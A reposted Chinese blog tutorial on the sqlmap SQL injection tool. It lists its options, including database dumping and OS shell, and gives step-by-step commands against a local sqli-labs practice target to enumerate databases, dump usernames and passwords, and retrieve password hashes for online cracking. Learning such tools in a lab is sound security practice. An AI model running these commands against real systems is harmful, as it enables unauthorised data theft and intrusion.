0


sqlmap使用

sqlmap介绍

1.sqlmap简介

sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,
访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、
PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。

2.sqlmap下载

Sqlmap下载地址:https://sqlmap.org/
在这里插入图片描述

3.sqlmap使用

注:sqlmap使用需要配置python环境 推荐使用python2.7或者3.9版本

常用命令

-u 指定目标URL (可以是http协议也可以是https协议)
-d 连接数据库
–dbs 列出所有的数据库
–current-db 列出当前数据库
–tables 列出当前的表
–columns 列出当前的列
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
–dump 获取字段中的数据
–dump-all 拖库
–batch 自动选择yes
–smart 启发式快速判断,节约浪费时间
–forms 尝试使用post注入
-r 加载文件中的HTTP请求(本地保存的请求包txt文件)
-l 加载文件中的HTTP请求(本地保存的请求包日志文件)
-g 自动获取Google搜索的前一百个结果,对有GET参数的URL测试
-o 开启所有默认性能优化
–tamper 调用脚本进行注入
-v 指定sqlmap的回显等级
–delay 设置多久访问一次
–os-shell 获取主机shell,一般不太好用,因为没权限
-m 批量操作
-c 指定配置文件,会按照该配置文件执行动作
-data data指定的数据会当做post数据提交
-timeout 设定超时时间
-level 设置注入探测等级共有五个等级,默认为1级, 这个参数不仅影响使用哪些payload同时也会影响测试的注入点,GET和POST的数据都会测试,HTTP Cookie在level为2的时候就会测试,HTTP User-Agent/Referer头在level为3的时候就会测试。总之在你不确定哪个payload或者参数为注入点的时候,为了保证全面性,建议使用高的level值。
–is-dba 判断当前用户是否为数据库管理员权限
–risk 风险等级
–identify-waf 检测防火墙类型
–param-del=“分割符” 设置参数的分割符
–skip-urlencode 不进行url编码
–keep-alive 设置持久连接,加快探测速度
–null-connection 检索没有body响应的内容,多用于盲注
–thread 最大为10 设置多线程

–delay 有些web服务器请求访问太过频繁可能会被防火墙拦截,使用–delay就可以设定两次http请求的延时

–safe-url 有的web服务器会在多次错误的访问请求后屏蔽所有请求,使用–safe-url 就可以每隔一段时间去访问一个正常的页面。

–tamper 语法:–tamper [“脚本名称”]
当调用多个脚本的时候,脚本之间用逗号隔开,调用的脚本在 sqlmap文件夹下的 tamper 文件夹中

使用方法

1.打开salmap文件夹 在sqlmap文件夹 路径栏输入cmd打卡开cmd命令窗口
在这里插入图片描述在这里插入图片描述
2.sqlmap判断网站是否存在sql注入漏洞出现以下页面 就存在漏洞
python sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1”
在这里插入图片描述3.使用sqlmap查询获取当前用户下所有数据库
python sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --dbs
在这里插入图片描述4.sqlmap获取当前数据库
python sqlmap.py -v3 -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --current-db
在这里插入图片描述5.sqlmap获取数据库表名
python sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” -D “security” --tables
在这里插入图片描述6.sqlmap获取字段名
python sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” -D “security” --tables -T “users” --columns
在这里插入图片描述7.sqlmap获取字段内容
python sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” -D “security” --tables -T “users” -C “username,password” --dump
在这里插入图片描述8.sqlmap获取数据库密码 如果当前用户有读取密码的权限就会列出密码的hash值 可以在线解密
python sqlmap.py -v3 -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --password
在这里插入图片描述解密网站推荐https://www.cmd5.com/
在这里插入图片描述还有其他一些用法大家可以自己探索一下,也可私我交流

标签: 网络安全

本文转载自: https://blog.csdn.net/weixin_53440207/article/details/129127421
版权归原作者 制冷少年的成长日记 所有, 如有侵权,请联系我们删除。

“sqlmap使用”的评论:

还没有评论